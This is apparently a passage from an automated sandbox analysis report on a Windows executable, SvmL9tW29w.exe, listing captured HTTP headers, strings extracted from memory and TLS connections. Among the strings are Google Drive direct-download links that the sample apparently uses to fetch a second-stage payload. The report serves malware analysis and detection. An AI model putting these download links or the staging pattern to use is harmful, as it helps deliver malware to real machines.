/_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5LKexngoAHo5bjj0Sh85FQ5LzNKt-QAP5_SQxK0Sfq9s9Qps7gIxkJSEV1F8qVIqmikLiO5KIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:57:19 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-J3jdjFcVKRNgzr-z6pzFmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: SvmL9tW29w.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: SvmL9tW29w.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: SvmL9tW29w.exe, 00000009.00000001.3517314416.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: SvmL9tW29w.exe, 00000009.00000001.3517314416.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: SvmL9tW29w.exe, 00000009.00000001.3517314416.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: SvmL9tW29w.exe, 00000009.00000003.3631364810.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.0000000006305000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3608742977.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: SvmL9tW29w.exe, 00000009.00000003.3715379970.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3631321160.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655654873.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3642567377.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3751806082.000000000627A000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704761871.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668258540.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704647426.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3642509957.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681426185.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3631364810.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: SvmL9tW29w.exe, 00000009.00000003.3655654873.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704761871.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668258540.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704647426.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681426185.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/I
      Source: SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/crosoft
      Source: SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/gle.
      Source: SvmL9tW29w.exe, 00000009.00000002.3751806082.000000000627A000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704761871.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668258540.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704647426.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3642509957.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681426185.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3631364810.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y
      Source: SvmL9tW29w.exe, 00000009.00000002.3751806082.000000000627A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5YX
      Source: SvmL9tW29w.exe, 00000009.00000003.3715379970.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704761871.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704647426.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5YvHIjqIddEF9jo5Y
      Source: SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/vM
      Source: SvmL9tW29w.exe, 00000009.00000003.3715379970.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704761871.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704647426.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681426185.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/zq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download
      Source: SvmL9tW29w.exe, 00000009.00000002.3751806082.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704647426.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3642509957.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681426185.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3631364810.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=download
      Source: SvmL9tW29w.exe, 00000009.00000003.3715379970.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=downloadI
      Source: SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=downloadM
      Source: SvmL9tW29w.exe, 00000009.00000003.3715379970.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655654873.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3642567377.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704761871.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668258540.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704647426.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3642509957.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681426185.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Dwzq0nL10feO8GJ0uvHIjqIddEF9jo5Y&export=downloadid
      Source: SvmL9tW29w.exe, 00000009.00000003.3619637227.00000000062C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/g_
      Source: SvmL9tW29w.exe, 00000009.00000001.3517314416.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: SvmL9tW29w.exe, 00000009.00000003.3631364810.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.0000000006305000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3608742977.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: SvmL9tW29w.exe, 00000009.00000003.3727364908.0000000006309000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.000000000630B000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.000000000630E000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3752107666.0000000006309000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3608802993.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.000000000630E000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3619637227.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3752107666.000000000630E000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3631321160.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655654873.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.000000000630E000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3642567377.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668258540.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704761871.000000000630E000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.0000000006309000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704761871.000000000630B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: SvmL9tW29w.exe, 00000009.00000003.3631364810.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.0000000006305000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3608742977.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com(
      Source: SvmL9tW29w.exe, 00000009.00000003.3631364810.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.0000000006305000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3608742977.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: SvmL9tW29w.exe, 00000009.00000003.3727364908.0000000006309000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.000000000630B000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.000000000630E000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3752107666.0000000006309000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3608802993.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.000000000630E000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3619637227.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3752107666.000000000630E000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3631321160.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655654873.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.000000000630E000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3642567377.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668258540.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704761871.000000000630E000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.0000000006309000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704761871.000000000630B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49971 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.7:49972 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49973 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49979 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49983 version: TLS 1.2
